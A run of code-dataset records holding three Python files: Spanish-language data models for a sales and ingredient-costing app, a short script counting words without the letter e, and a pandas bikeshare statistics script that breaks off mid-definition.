vend.tipo = VendedorExterno.TIPO if lstDatos[ES_VENDEDOR] else \\\n VendedorInterno.TIPO\n \n @staticmethod\n def type():\n return Vendedor\n \nNOM_VENDEDOR_EXTERNO, = range(1)\nclass VendedorExterno(Vendedor):\n u\"\"\"VendedorExterno\n \"\"\"\n TIPO = 'vendedor_ext'\n \n def __init__(self, nombre):\n super(VendedorExterno, self).__init__(nombre)\n self.tipo = VendedorExterno.TIPO\n \n def __str__(self):\n return '{}'.format(self.nombre)\n \n @staticmethod\n def data2Object(lstDatos):\n vend = VendedorExterno(lstDatos[NOMBRE_VEND])\n return vend\n \n @staticmethod\n def object2Data(vend):\n return [vend.nombre, ]\n \n @staticmethod\n def editObject(vend, lstDatos):\n vend.nombre = lstDatos[NOMBRE_VEND]\n \n @staticmethod\n def type():\n return VendedorExterno\n \nNOM_VENDEDOR_INTERNO, = range(1)\nclass VendedorInterno(Vendedor):\n u\"\"\"VendedorInterno\n \"\"\"\n TIPO = 'vendedor_int'\n \n def __init__(self, nombre):\n super(VendedorInterno, self).__init__(nombre)\n self.tipo = VendedorInterno.TIPO\n \n def __str__(self):\n return '{}'.format(self.nombre)\n @staticmethod\n def type():\n return VendedorInterno\n \nVALOR_VENTA, VENDEDOR, FECHA_VENTA, SALDO_PARCIAL_VENTA, SUBTOTAL_VENTA = range(5)\nclass Venta(object):\n u\"\"\"Venta\n \"\"\"\n \n subtotal = 0.0\n total = 0.0\n \n def __init__(self, saldo_parcial, vendedor, fecha):\n 
self.saldo_parcial = saldo_parcial\n self.vendedor = vendedor\n self.fecha = fecha \n self.subtotal = 0.0\n \n def __str__(self):\n return '{}'.format(self.vendedor.nombre)\n \n def setSaldoParcial(self, saldo_parcial):\n self.saldo_parcial = saldo_parcial\n if isinstance(self.vendedor, VendedorInterno):\n self.subtotal = 0.0\n self.subtotal += self.saldo_parcial\n \n def addVentaProd(self, ventaProd):\n if ventaProd in self.colVentasProd:\n return False\n\n self.colVentasProd.append(ventaProd)\n return True\n \n def delVentaProd(self, i):\n del self.colVentasProd[i]\n \n def calcular(self):\n self.subtotal = 0.0\n for ventaProd in self.colVentasProd:\n ventaProd.calcular()\n self.subtotal += ventaProd.costo\n \n return self.subtotal\n \n def calcularSubtotal(self):\n if isinstance(self.vendedor, VendedorInterno):\n return self.saldo_parcial\n return self.subtotal\n \n def calcularSaldo(self):\n self.subtotal = 0.0\n for ventaProd in self.colVentasProd:\n ventaProd.setPrecioUnitario(self.fecha)\n ventaProd.totVentas()\n ventaProd.calcular()\n self.subtotal += ventaProd.costo\n return self.subtotal\n \n def calcularTotal(self):\n self.total = 0.0\n \n if isinstance(self.vendedor, VendedorInterno):\n self.total += self.saldo_parcial\n else:\n self.total = self.saldo_parcial + self.subtotal\n \n #print('TOTAL_:', self.total)\n return self.total\n \n @staticmethod\n def data2Object(lstDatos):\n venta = Venta(lstDatos[VALOR_VENTA], \n lstDatos[VENDEDOR],\n lstDatos[FECHA_VENTA])\n return venta\n \n @staticmethod\n def object2Data(venta):\n return [venta.valor, venta.vendedor, venta.fecha, \n venta.saldo_parcial, venta.subtotal]\n \n @staticmethod\n def editObject(venta, lstDatos):\n venta.vendedor = lstDatos[VENDEDOR]\n venta.valor = lstDatos[VALOR_VENTA]\n venta.fecha = lstDatos[FECHA_VENTA]\n venta.saldo_parcial = lstDatos[SALDO_PARCIAL_VENTA]\n \n @staticmethod\n def type():\n return Venta\n \nVALOR_VENTA, VENDEDOR, FECHA_VENTA, SALDO_PARCIAL_VENTA, SUBTOTAL_VENTA = range(5)\nclass Factura(object):\n u\"\"\"Factura\n \"\"\"\n num_factura = 0\n subtotal = 0.0\n total = 0.0\n con_cinco_por_ciento_descuento = False\n con_iva = False\n \n def __init__(self, vendedor, fecha):\n self.vendedor = vendedor\n self.fecha = fecha \n self.subtotal = 0.0\n \n def __str__(self):\n return '{}'.format(self.vendedor.nombre)\n \n def setSaldoParcial(self, saldo_parcial):\n self.saldo_parcial = saldo_parcial\n if isinstance(self.vendedor, VendedorInterno):\n self.subtotal = 0.0\n self.subtotal += self.saldo_parcial\n \n def addVentaProd(self, ventaProd):\n if ventaProd in self.colVentasProd:\n return False\n\n self.colVentasProd.append(ventaProd)\n return True\n \n def delVentaProd(self, i):\n del self.colVentasProd[i]\n \n def calcular(self):\n self.subtotal = 0.0\n for ventaProd in self.colVentasProd:\n ventaProd.calcular()\n self.subtotal += ventaProd.costo\n \n return self.subtotal\n \n def calcularSubtotal(self):\n if isinstance(self.vendedor, VendedorInterno):\n return self.saldo_parcial\n return self.subtotal\n \n def calcularSaldo(self):\n self.subtotal = 0.0\n for ventaProd in self.colVentasProd:\n ventaProd.setPrecioUnitario(self.fecha)\n ventaProd.totVentas()\n ventaProd.calcular()\n self.subtotal += ventaProd.costo\n return self.subtotal\n \n def calcularTotal(self):\n self.total = 0.0\n \n if isinstance(self.vendedor, VendedorInterno):\n self.total += self.saldo_parcial\n else:\n self.total = self.saldo_parcial + self.subtotal\n \n #print('TOTAL_:', self.total)\n return self.total\n \n 
@staticmethod\n def data2Object(lstDatos):\n venta = Venta(lstDatos[VENDEDOR],\n lstDatos[FECHA_VENTA])\n return venta\n \n @staticmethod\n def object2Data(venta):\n return [venta.valor, venta.vendedor, venta.fecha, \n venta.saldo_parcial, venta.subtotal]\n \n @staticmethod\n def editObject(venta, lstDatos):\n venta.vendedor = lstDatos[VENDEDOR]\n venta.fecha = lstDatos[FECHA_VENTA]\n \n @staticmethod\n def type():\n return Factura\n\n\nFECHA_SALDO, = range(1)\nclass SaldoDiario(object):\n u\"\"\" Saldo diario\n \"\"\"\n saldo_egresos = 0.0\n saldo_ventas_parcial = 0.0\n \n saldo_ventas_subtotal = 0.0\n saldo_tot_ventas = 0.0\n \n saldo_neto = 0.0\n saldo_parcial = 0.0\n \n def __init__(self, fecha_saldo):\n self.fecha_saldo = fecha_saldo\n \n def saldoEgresos(self):\n self.saldo_egresos = 0.0\n for mov in self.colMovEgresos:\n self.saldo_egresos += mov.saldo_parcial\n \n return self.saldo_egresos\n \n def saldoParcial(self):\n self.saldo_ventas_parcial = 0.0\n for venta in self.colVentas:\n #print('VENTA_SALDO:', venta.saldo_parcial)\n self.saldo_ventas_parcial += venta.saldo_parcial\n #print('SALDO:PARCIAL:', self.saldo_ventas_parcial)\n return self.saldo_ventas_parcial\n \n def saldoVentasSubtotal(self):\n self.saldo_ventas_subtotal = 0.0\n for venta in self.colVentas:\n if isinstance(venta.vendedor, VendedorExterno):\n self.saldo_ventas_subtotal += venta.subtotal\n \n print('SUBTOTAL:', self.saldo_ventas_subtotal) \n return self.saldo_ventas_subtotal\n \n def saldoTotalVentas(self):\n self.saldo_tot_ventas = self.saldo_ventas_parcial + self.saldo_ventas_subtotal\n return self.saldo_tot_ventas\n \n \n def saldo(self):\n self.saldo_neto = self.saldo_ventas_parcial + self.saldo_ventas_subtotal - self.saldo_egresos\n return self.saldo_neto\n \n @staticmethod\n def data2Object(lstDatos):\n saldo = SaldoDiario(lstDatos[FECHA_SALDO])\n return saldo\n \n @staticmethod\n def object2Data(saldo):\n return [saldo.fecha_saldo, ]\n \n @staticmethod\n def editObject(saldo, lstDatos):\n saldo.fecha_saldo = lstDatos[FECHA_SALDO]\n \n @staticmethod\n def type():\n return SaldoDiario\n \nPROD, CANT_INICIAL, DEVOLUCIONES = range(3)\nclass VentaProd(object):\n u\"\"\"Venta producto\n \"\"\"\n \n CANT_CARGAS = 6\n precio_unitario = 0.0\n costo = 0.0\n tot_venta = 0\n cant_neta = 0\n \n def __init__(self, producto, cant_inicial=0, devoluciones=0, \n fecha_ingreso=datetime.date.today()):\n self.setProducto(producto)\n self.cant_inicial = cant_inicial\n self.devoluciones = devoluciones\n \n def setProducto(self, producto, fecha_ingreso=datetime.date.today()):\n self.producto = producto\n self.setPrecioUnitario(fecha_ingreso)\n \n def setDevoluciones(self, devoluciones):\n if devoluciones > self.tot_venta:\n return False\n else:\n self.devoluciones = devoluciones\n return True\n \n def setPrecioUnitario(self, fecha_ingreso): \n self.precio_unitario = round(self.producto.precioActivo(fecha_ingreso), 2)\n \n def totVentas(self):\n tot = 0.0\n for i in xrange(VentaProd.CANT_CARGAS):\n tot = tot + self.colCargaProd[i].cant\n \n self.tot_venta = tot\n \n return self.tot_venta\n \n def cantNeta(self):\n self.cant_neta = self.tot_venta - self.devoluciones\n \n return self.cant_neta\n \n def calcular(self):\n self.costo = round(self.precio_unitario * float((self.tot_venta - self.devoluciones)), 2)\n \n return self.costo\n \n @staticmethod\n def data2Object(lstDatos):\n ventaProd = VentaProd(lstDatos[PROD], \n lstDatos[CANT_INICIAL], \n lstDatos[DEVOLUCIONES])\n \n colCargaProd = []\n \n for i in 
range(VentaProd.CANT_CARGAS):\n cargaProd = CargaProd()\n colCargaProd.append(cargaProd)\n \n ventaProd.colCargaProd = colCargaProd\n \n return ventaProd\n \n @staticmethod\n def object2Data(ventaProd):\n return [ventaProd.producto, ventaProd.cant_inicial, \n ventaProd.devoluciones]\n \n @staticmethod\n def editObject(ventaProd, lstDatos):\n ventaProd.producto = lstDatos[PROD]\n ventaProd.cant_inicial = lstDatos[CANT_INICIAL]\n ventaProd.devoluciones = lstDatos[DEVOLUCIONES]\n \n @staticmethod\n def type():\n return VentaProd\n\nCANT, FECHA_HORA = range(2)\nclass CargaProd(object):\n u\"\"\"Carga producto\n \"\"\"\n \n def __init__(self, cant=0.0, fecha_hora=datetime.date.today()):\n self.cant = cant\n self.fecha_hora = fecha_hora\n \n @staticmethod\n def data2Object(lstDatos):\n cargaProd = CargaProd(lstDatos[CANT], \n lstDatos[FECHA_HORA])\n return cargaProd\n \n @staticmethod\n def object2Data(cargaProd):\n return [cargaProd.cant, cargaProd.fecha_hora]\n \n @staticmethod\n def editObject(cargaProd, lstDatos):\n cargaProd.cant = lstDatos[CANT]\n cargaProd.fecha_hora = lstDatos[FECHA_HORA]\n \n @staticmethod\n def type():\n return CargaProd\n\n#FECHA_MOV_VENTA_PROD = range(1)\n#class MovVentaProd(object):\n# pass\n# \"\"\"Clase que representa el movimiento de la venta diaria detallada.\"\"\"\n \n # total = 0.0\n \n # def __init__(self, fecha=datetime.date.today()):\n # self.fecha = fecha\n # \n #def __str__(self):\n # return '{}'.format(self.vendedor.nombre)\n \n #def addVentaProd(self, ventaProd):\n # if ventaProd in self.colVentasProd:\n # return False\n\n # self.colVentasProd.append(ventaProd)\n #return True\n \n #def delVentaProd(self, i):\n # del self.colVentasProd[i]\n \n #def calcular(self):\n # self.total = 0.0\n # for ventaProd in self.colVentasProd:\n # ventaProd.calcular()\n # self.total += ventaProd.costo\n \n #return self.total\n \n #def calcularSaldo(self):\n # self.total = 0.0\n # for ventaProd in self.colVentasProd:\n # ventaProd.setPrecioUnitario(self.fecha)\n # ventaProd.totVentas()\n # ventaProd.calcular()\n # self.total += ventaProd.costo\n #return self.total\n \n #@staticmethod\n #def data2Object(lstDatos):\n # mov_venta = MovVentaProd(lstDatos[FECHA_MOV_VENTA_PROD])\n # return mov_venta\n \n #@staticmethod\n #def object2Data(mov_venta):\n # return [mov_venta.fecha, ]\n \n #@staticmethod\n #def editObject(mov_venta, lstDatos):\n # mov_venta.fecha = lstDatos[FECHA_MOV_VENTA_PROD]\n \n #@staticmethod\n #def type():\n # return MovVentaProd\n \nPROM_VENTA_RF, CANT_PERS_RF, CAJA_ABAJO_RF, FECHA_RF = range(4)\nclass ResumenFiscal(object):\n u\"\"\"Clase que representa un resumen fiscal.\"\"\"\n\n cant_pers_abajo = 0\n \n def __init__(self, prom_venta, cant_pers, caja_abajo, fecha):\n self.prom_venta = prom_venta\n self.cant_pers = cant_pers\n self.caja_abajo = caja_abajo\n self.fecha = fecha\n self.cant_pers_abajo = 0\n\n def __str__(self):\n return '{}-{}'.format(self.prom_venta)\n \n @staticmethod\n def data2Object(lstDatos):\n rf = ResumenFiscal(lstDatos[PROM_VENTA_RF], lstDatos[CANT_PERS_RF], \n lstDatos[CAJA_ABAJO_RF], lstDatos[FECHA_RF])\n return rf\n \n @staticmethod\n def object2Data(rf):\n return [rf.prom_venta, rf.cant_pers, \n rf.caja_abajo, rf.fecha]\n \n @staticmethod\n def editObject(rf, lstDatos):\n rf.prom_venta = lstDatos[PROM_VENTA_RF]\n rf.cant_pers = lstDatos[CANT_PERS_RF]\n rf.caja_abajo = lstDatos[CAJA_ABAJO_RF]\n rf.fecha = lstDatos[FECHA_RF]\n \n @staticmethod\n def type():\n return ResumenFiscal\n \nNOM_INGRED, PRECIO_INGREDIENTE, UNIDAD_INGRED, 
CANT_UNIDAD_INGRED = range(4)\nclass Ingrediente(object):\n \"\"\"Clase que representa un ingrediente.\"\"\"\n \n UNIDAD_KG = 0\n UNIDAD_LTS = 1\n UNIDAD_OTROS = 2\n \n CANT_UNIDAD_KG_LTS = -1\n CANT_UNIDAD_KG_LTS_X1 = 0\n \n LST_UNIDADES = [u'Kg.', u'Lts.', u'Unidades']\n LST_MULTIPLO_UND = ['grs.', 'cm3', 'und.']\n LST_CANT_UNIDADADES = [1000, 1]#Equivalencias por kilo/litro o gramo/cm3.\n \n precio = 0.0\n \n def __init__(self, nombre, unidad=UNIDAD_KG, cantUnidad=CANT_UNIDAD_KG_LTS):\n self.nombre = nombre\n self.unidad = unidad\n self.cantUnidad = cantUnidad\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n def precioActivo(self, fecha_precio=datetime.date.today()):\n lstPrecios = set()\n \n #print('FECHA_FILTRO:', fecha_precio)\n #if self.id == 1:\n # for precio_guardado in self.colPrecioIngred:\n # print(precio_guardado)\n #print('MAX_PRECIO:', max(self.colPrecioIngred))\n \n for precio_guardado in self.colPrecioIngred:\n if precio_guardado.fecha_ingreso <= fecha_precio:\n lstPrecios.add(precio_guardado)\n \n if len(lstPrecios) > 0:\n self.precio = max(lstPrecios).precio\n else: \n self.precio = 0.0#self.precio = min(self.colPrecioIngred).precio\n \n return self.precio\n \n def __str__(self):\n return '{}'.format(self.nombre)\n \n @staticmethod\n def data2Object(lstDatos):\n ingred = Ingrediente(lstDatos[NOM_INGRED], \n lstDatos[UNIDAD_INGRED], lstDatos[CANT_UNIDAD_INGRED])\n \n ingred.precio = lstDatos[PRECIO_INGREDIENTE]\n \n precioIngred = PrecioIngred(lstDatos[PRECIO_INGREDIENTE], datetime.date.today())\n ingred.colPrecioIngred.append(precioIngred)\n \n return ingred\n \n @staticmethod\n def object2Data(ingred):\n #for pre in ingred.colPrecioIngred:\n # print(pre.precio)\n precio = 0.0\n if len(ingred.colPrecioIngred) > 0:\n precio = ingred.colPrecioIngred[len(ingred.colPrecioIngred) - 1].precio\n \n return [ingred.nombre, precio, \n ingred.unidad, ingred.cantUnidad]\n \n @staticmethod\n def editObject(ingred, lstDatos):\n ingred.nombre= lstDatos[NOM_INGRED]\n ingred.precio = lstDatos[PRECIO_INGRED]\n ingred.unidad = lstDatos[UNIDAD_INGRED]\n ingred.cantUnidad = lstDatos[CANT_UNIDAD_INGRED]\n \n precioIngred = PrecioIngred(lstDatos[PRECIO_INGREDIENTE], datetime.date.today())\n ingred.colPrecioIngred.append(precioIngred)\n \n @staticmethod\n def type():\n return Ingrediente\n \nINGRED, CANT_INGRED, FECHA_INGRESO_COSTO, PRECIO_INGRED_COSTO = range(4)\nclass MovCostoIngred(object):\n u\"\"\"Clase que representa el costo de un ingrediente.\"\"\"\n \n precio_unitario = 0.0\n costo = 0.0\n \n def __init__(self, ingrediente, cant, \n fecha_ingreso=datetime.date.today()\n ):\n self.setIngrediente(ingrediente, fecha_ingreso)\n self.cant = cant\n #self.fechaIngreso = fechaIngreso\n #self.precio_ingred = precio_ingred\n #self.ingrediente.precio = precio_ingred\n \n def copy(self):\n movCostoIngred = MovCostoIngred(self.ingrediente, self.cant)\n \n return movCostoIngred\n\n def setIngrediente(self, ingred, fecha_ingreso=datetime.date.today()):\n self.ingrediente = ingred\n self.setPrecioUnitario(fecha_ingreso)\n \n def setPrecioUnitario(self, fecha_ingreso): \n self.precio_unitario = round(self.ingrediente.precioActivo(fecha_ingreso), 2)\n \n def calcular(self):\n #print(self.cant, self.ingrediente.cantUnidad, self.precio_unitario, \n # round(self.cant/float(self.ingrediente.cantUnidad) * self.precio_unitario, 2))\n cant_unidad = self.ingrediente.cantUnidad\n \n if cant_unidad <= Ingrediente.CANT_UNIDAD_KG_LTS_X1:\n 
cant_unidad = Ingrediente.LST_CANT_UNIDADADES[cant_unidad + 1]\n \n #self.costo = round(self.cant/float(self.ingrediente.cantUnidad) * self.precio_unitario, 2)\n self.costo = round(self.cant/float(cant_unidad) * self.precio_unitario, 2)\n return self.costo\n \n def __str__(self):\n return '{}-{}'.format(self.ingrediente, self.cant)\n \n @staticmethod\n def data2Object(lstDatos):\n movCostoProd = MovCostoIngred(lstDatos[INGRED, CANT_INGRED])\n if len(lstDatos) > 2 and lstDatos[FECHA_INGRESO_COSTO]:\n movCostoProd.fechaIngreso = lstDatos[FECHA_INGRESO_COSTO]\n movCostoProd.precio_ingred = lstDatos[PRECIO_INGRED_COSTO]\n return movCostoProd\n \n @staticmethod\n def object2Data(movCostoProd):\n return [movCostoProd.ingrediente, movCostoProd.cant, \n movCostoProd.fechaIngreso, movCostoProd.precio_ingred]\n \n @staticmethod\n def editObject(movCostoProd, lstDatos):\n movCostoProd.ingrediente= lstDatos[INGRED]\n movCostoProd.cant = lstDatos[PRECIO_INGRED_COSTO]\n movCostoProd.fechaIngreso = lstDatos[FECHA_INGRESO_COSTO]\n movCostoProd.precio_ingred = lstDatos[PRECIO_INGRED_COSTO]\n \n @staticmethod\n def type():\n return MovCostoIngred\n\nFECHA_COSTO_X, GASTOS_COSTO_X, CANTIDAD_PROD_X, DESC_COSTO_X = range(4)\nclass CostoProd(object):\n u\"\"\"Clase que representa el costo de un producto.\"\"\"\n \n def __init__(self, producto, fecha_ingreso=datetime.date.today(), gastos=0.0, cant=0):\n self.producto = producto\n self.fecha_ingreso = fecha_ingreso\n self.gastos = gastos\n self.cant = cant\n self.total = 0.0\n self.desc = ''\n \n def addMovCosto(self, movCosto):\n if movCosto in self.colMovCostoIngred:\n return False\n\n self.colMovCostoIngred.append(movCosto)\n \n return True\n \n def delMovCosto(self, i):\n del self.colMovCostoIngred[i]\n \n def calcular(self):\n self.total = 0.0\n for mov in self.colMovCostoIngred:\n mov.calcular()\n self.total += mov.costo\n \n \n def __str__(self):\n #return '{}-{}'.format(self.producto, self.cant)\n return '{}'.format(self.fecha_ingreso)\n \n @staticmethod\n def data2Object(lstDatos):\n costoProd = CostoProd(lstDatos[FECHA_COSTO_X], lstDatos[GASTOS_COSTO_X], \n lstDatos[CANTIDAD_PROD_X])\n \n costoProd.desc = lstDatos[DESC_COSTO_X]\n \n return costoProd\n \n @staticmethod\n def object2Data(costoProd):\n return [costoProd.fecha_ingreso, costoProd.gastos, \n costoProd.cant, costoProd.desc]\n \n @staticmethod\n def editObject(costoProd, lstDatos):\n costoProd.ingrediente= lstDatos[FECHA_COSTO_X]\n costoProd.cant = lstDatos[GASTOS_COSTO_X]\n costoProd.fechaIngreso = lstDatos[CANTIDAD_PROD_X]\n costoProd.desc = lstDatos[DESC_COSTO_X]\n \n @staticmethod\n def type():\n return CostoProd\n \nPRECIO_INGRED, FECHA_INGRESO_INGRED = range(2)\nclass PrecioIngred(object):\n u\"\"\"Clase que representa el precio de un ingrediente.\"\"\"\n \n def __init__(self, precio, fecha_ingreso):\n self.precio = precio\n self.fecha_ingreso = fecha_ingreso\n \n def __str__(self):\n return '{}-{}'.format(self.precio, self.fecha_ingreso)\n \n @staticmethod\n def data2Object(lstDatos):\n precioIngred = PrecioIngred(lstDatos[PRECIO_INGRED, FECHA_INGRESO_INGRED])\n return precioIngred\n \n @staticmethod\n def object2Data(precioIngred):\n return [precioIngred.ingrediente, precioIngred.cant]\n \n @staticmethod\n def editObject(precioIngred, lstDatos):\n precioIngred.precio = lstDatos[PRECIO_INGRED]\n precioIngred.fecha_ingreso = lstDatos[FECHA_INGRESO_INGRED]\n \n @staticmethod\n def type():\n return 
PrecioIngred","repo_name":"jorgesaw/imperial","sub_path":"imperial/imperial/model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":39548,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11324750815","text":"fin = open('words.txt')\n\n'''for line in fin:\n if len(line) == 20:\n print(line)'''\n\n#fin.seek(0)\n\ndef has_no_e(s):\n tot = len(s)\n count = 0\n for i in s:\n if 'e' not in i:\n count+= 1\n print(i)\n\n return count / tot * 100\n\n\na = [x.strip() for x in fin]\n\nper = has_no_e(a)\nprint(per)\n","repo_name":"0siris7/Think-python-repo","sub_path":"wordplay.py","file_name":"wordplay.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29546294206","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\n# glopal Tuples of monthes and days names to be used later\nMonths = (\"january\", \"february\", \"march\", \"april\", \"may\", \"june\")\nDays = (\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\", \"saturday\", \"sunday\")\n\n# Global Flages\nMonth_filter_flage = False\nDay_filter_flage = False\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n \n print('\\nHello! Let\\'s explore some US bikeshare data!')\n print('---------------------------------------------\\n')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True :\n try :\n inputed_city = input(\"Choose one of the below cities to take a look at thier stats. \\nType one of these cities (chicago, new york city, washington): \").lower()\n if inputed_city == \"chicago\" or inputed_city == \"new york city\" or inputed_city == \"washington\" :\n print (\"\\nGreat you choose \",inputed_city, \"\\n\")\n break\n else :\n print (\"\\nWrong city name please try again.\\nHint: make sure that your spilling is as given list of cities....\\n\")\n except :\n print (\"\\nWow wrong input please try again....\\n\")\n continue\n \n # get user input for month (all, january, february, ... , june)\n while True :\n try :\n month_filter_enable = input(\"Do you want to apply a filter by month? 
[ (yes) or (no) ].\\n ---> \").lower()\n break\n except :\n print (\"\\nWow wrong input please try again....\\n\")\n continue\n \n while True :\n try : \n if month_filter_enable == \"yes\" :\n print('\\nOK then choose one of the first 6 monthes of the year to filter data.') \n inputed_month = input('Type one of these monthes [\"january\", \"february\", \"march\", \"april\", \"may\", \"june\"] : ').lower() \n if inputed_month in Months :\n print (\"\\nGreat you choose \", inputed_month, \"\\n\")\n break \n else :\n print (\"\\nWrong month name please try again.\\nHint: make sure that your spilling is as given list of months provided....\\n\") \n elif month_filter_enable == \"no\" :\n print ('\\nOK then all 6 months are included.')\n inputed_month = \"all\" \n break\n else :\n print ('\\nOK that is not a clear [yes] or [no].')\n month_filter_enable_sure = input(\"\\nAre you sure of your choice?\\n(yes) ---> to contiue and use all months.\\n(no) ---> to try again and apply a month filter.\\n---> \").lower() \n if month_filter_enable_sure != \"no\":\n inputed_month = \"all\"\n print ('\\nOK then all 6 months are included.')\n break\n else : \n month_filter_enable = \"yes\"\n continue\n except :\n print (\"\\nWow wrong input please try again....\")\n continue\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n while True :\n try :\n day_filter_enable = input(\"\\nDo you want to apply a filter by day? [ (yes) or (no) ].\\n ---> \").lower()\n break\n except :\n print (\"\\nWow wrong input please try again....\\n\")\n continue\n \n while True :\n try : \n if day_filter_enable == \"yes\" :\n print ('\\nOK then choose a day of the week to filter data.')\n inputed_day = input('Type one of these days [\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\", \"saturday\", \"sunday\"] : ').lower()\n if inputed_day in Days :\n print (\"\\nGreat you choose \", inputed_day, \"\\n\")\n break\n else :\n print (\"\\nWrong day name please try again.\\nHint: make sure that your spilling is as given list of days....\\n\")\n elif day_filter_enable == \"no\" :\n print ('\\nOK then all days of the week are included.')\n inputed_day = \"all\" \n break\n else :\n print ('\\nOK that is not a clear [yes] or [no].')\n day_filter_enable_sure = input(\"\\nAre you sure of your choice?\\n(yes) ---> to contiue and use all days.\\n(no) ---> to try again and apply a day filter.\\n---> \").lower() \n if day_filter_enable_sure != \"no\":\n inputed_day = \"all\"\n print ('\\nOK then all days of the week are included.')\n break\n else : \n day_filter_enable = \"yes\"\n continue\n except :\n print (\"\\nWow wrong input please try again....\\n\")\n continue\n \n print('-'*100)\n return inputed_city, inputed_month, inputed_day\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n #declearing global flages to apply changes\n global Month_filter_flage, Day_filter_flage\n \n #load all the desired city data\n city_data_df = pd.read_csv 
(CITY_DATA[city])\n \n #filtering all data by:\n \n # 1-converting the ride [Start Time] column of the Data frame from (string object) to a (Date Time object).\n city_data_df[\"Start Time\"]= pd.to_datetime(city_data_df[\"Start Time\"])\n \n # 2-creating new columns for [month] and [day] from [Start Time] column\n city_data_df[\"Month\"]= city_data_df[\"Start Time\"].dt.month\n city_data_df[\"Day\"]= city_data_df[\"Start Time\"].dt.weekday_name\n \n # 3-filtring data by month (if user desired)\n if month in Months :\n Month_filter_flage = True\n month= Months.index(month) + 1 # got the month int number to filter the [Month] column with\n city_data_df= city_data_df[city_data_df[\"Month\"] == month] # filtring the data frame rows my the month number \n else :\n Month_filter_flage = False\n \n # 4-filtring data by day (if user desired)\n if day in Days :\n Day_filter_flage = True\n city_data_df= city_data_df[city_data_df[\"Day\"] == day.title()] #filtring the data frame by day name {remember [data_frame.dt.weekday_name] returnes capital first letter #of the day name}\n else :\n Day_filter_flage = False\n \n # 5-Return filtered data frame for further processing\n return city_data_df\n\n#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef time_stats(df, month, day):\n \"\"\"\n Displays statistics on the most frequent times of travel.\n \n Args:\n (df ) Pandas DataFrame containing city data filtered as per user inputs\n (str) month - name of the month inputed by the user\n (str) day - name of the day of week inputed by the user\n Returns:\n no return\n \"\"\"\n # printing a title \n print (\"\\n|*************************************|\")\n print (\"|....Most Frequent Times of Travel....|\")\n print (\"|*************************************|\\n\")\n\n start_time = time.time()\n\n # display the most common month\n if Month_filter_flage == True : # if we filter by month we do not need any computation to get common month\n print(\"Most common month is the one you choose as a filter : {}\\n\".format(month.title()))\n else :\n # get most common month using mood method\n most_common_month = df[\"Month\"].mode()[0]\n print(\"Most common month is: {}\\n\".format(Months[most_common_month-1].title()))\n \n # get the most common day of week\n if Day_filter_flage == True : # if we filter by month we do not need any computation to get common day\n print(\"Most common day of the week is one you choose as a filter : {}\".format(day.title()))\n else :\n # get most common day of the week using mood method\n most_common_day = df[\"Day\"].mode()[0]\n print(\"Most common day of the week is: {}\\n\".format(most_common_day))\n \n # get most common hour in the day using mood method\n df[\"start_hour\"]= df[\"Start Time\"].dt.hour # creating new column for start hour only to filter data with\n most_common_hour = df[\"start_hour\"].mode()[0]\n print(\"Most popular start hour is: {}\".format(most_common_hour))\n\n print(\"\\n\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*100)\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n \ndef station_stats(df):\n \"\"\"\n Displays statistics on the most popular stations and trip.\n \n Args:\n (df) Pandas DataFrame containing city data filtered as per user inputs\n Returns:\n no 
return \n \"\"\"\n \n print (\"\\n|**************************************|\")\n print (\"|....Most Popular Stations and Trip....|\")\n print (\"|**************************************|\\n\")\n\n start_time = time.time()\n\n # display most commonly used start station using mode method on the [Start Satation] column\n most_common_start_station = df[\"Start Station\"].mode()[0]\n print(\"Most common start station is: [ {} ]\\n\".format(most_common_start_station))\n\n # display most commonly used end station\n most_common_end_station = df[\"End Station\"].mode()[0]\n print(\"Most common end station is: [ {} ]\\n\".format(most_common_end_station))\n\n # display most frequent trip\n df[\"trip\"]= df[\"Start Station\"] + \":\" + df[\"End Station\"] # creating new column for Trip to get trip stats\n most_common_trip = df[\"trip\"].mode()[0]\n print(\"Most common trip is : from [{}] to [{}]\".format(most_common_trip.split(\":\")[0], most_common_trip.split(\":\")[1]))\n \n print(\"\\n\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*100)\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef trip_duration_stats(df):\n \"\"\"\n Displays statistics on the total and average trips duration.\n \n Args:\n (df) Pandas DataFrame containing city data filtered as per user inputs\n Returns:\n no return \n \"\"\"\n \n print (\"\\n|***************************|\")\n print (\"|....Trip Duration Stats....|\")\n print (\"|***************************|\\n\")\n start_time = time.time()\n \n # display total travel time\n total_trips_time = df[\"Trip Duration\"].sum(axis = 0, skipna = True)\n print(\"Total time of all trips : {} hours\\n\".format(round((total_trips_time/60)/60, 1)))\n \n # display mean travel time\n average_trip_time = df[\"Trip Duration\"].mean(axis = 0, skipna = True)\n print(\"Average trip duration is: {} mins\".format(round(average_trip_time/60, 1)))\n \n print(\"\\n\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*100)\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef 